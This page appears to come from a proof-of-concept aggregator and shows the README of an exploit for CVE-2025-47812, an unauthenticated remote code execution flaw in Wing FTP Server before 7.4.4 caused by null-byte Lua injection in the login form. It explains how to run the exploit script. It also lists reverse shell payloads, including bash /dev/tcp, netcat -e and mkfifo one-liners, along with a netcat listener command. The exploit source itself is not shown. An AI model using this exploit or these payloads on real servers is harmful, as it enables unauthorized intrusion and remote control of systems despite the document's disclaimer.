CVE-2025-47812 PoC — Wing FTP Server 7.4.3及 安全漏洞

Source

Associated Vulnerability

Readme

===========================================================

CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE)

===========================================================

Author: blindma1den

Date: July 2025

Exploit Type: Remote Code Execution (Unauthenticated)

Target: Wing FTP Server < 7.4.4

CVSS Score: 10.0 (Critical)

-----------------------------------------------------------
DESCRIPTION
-----------------------------------------------------------
This script exploits CVE-2025-47812, a critical vulnerability
in Wing FTP Server's web interface that allows remote attackers 
to execute arbitrary system commands or open a reverse shell 
without authentication.

The flaw is caused by improper handling of null bytes (`%00`) 
in the login form (`/loginok.html`). This allows Lua code 
injection into session files, which are later evaluated 
when endpoints like `/dir.html` are accessed.

-----------------------------------------------------------
SOURCES 
-----------------------------------------------------------
NVD Description: https://nvd.nist.gov/vuln/detail/CVE-2025-47812

-----------------------------------------------------------
FEATURES
-----------------------------------------------------------
- Command execution (e.g., `whoami`, `uname -a`)
- Multiple reverse shell payloads
- Extracts UID session cookie automatically
- Clean modular Python 3 implementation

-----------------------------------------------------------
REQUIREMENTS
-----------------------------------------------------------
- Python 3.7+
- requests module

Install dependencies:
```bash
pip install requests
```

-----------------------------------------------------------
USAGE
-----------------------------------------------------------
Run the script:

```bash
python3 wingftp_rce_exploit.py
```

You will be prompted for:

- Target URL (e.g., http://127.0.0.1:5466)
- Username (default: anonymous)
- Exploit mode:
  [1] Run a command
  [2] Launch reverse shell

-----------------------------------------------------------
EXAMPLES
-----------------------------------------------------------

[1] RUN COMMAND:

```text
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
```

[2] REVERSE SHELL:

```text
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
```

Start your listener before triggering the shell:

```bash
nc -lvnp 4444
```

-----------------------------------------------------------
PAYLOADS USED (REVERSE SHELL)
-----------------------------------------------------------
Bash:
bash -i >& /dev/tcp/IP/PORT 0>&1

Python3:
python3 -c 'import socket,subprocess,os; ...'

Netcat:
nc IP PORT -e /bin/sh

PHP:
php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...

-----------------------------------------------------------
DISCLAIMER
-----------------------------------------------------------
This code is for educational purposes only. Do NOT use
this exploit against systems you do not own or have explicit
authorization to test. Unauthorized use is illegal and unethical.

Patch your systems immediately. Wing FTP Server 7.4.4 resolves
this vulnerability.

Happy hacking!

File Snapshot

 [4.0K]  /data/pocs/379cde5221f2fedff1737fc742bedceb200b8eca
├── [ 660]  CONTRIBUTING.md
├── [4.8K]  exploit.py
├── [1.1K]  LICENSE.md
└── [3.2K]  README.md

0 directories, 4 files

Remarks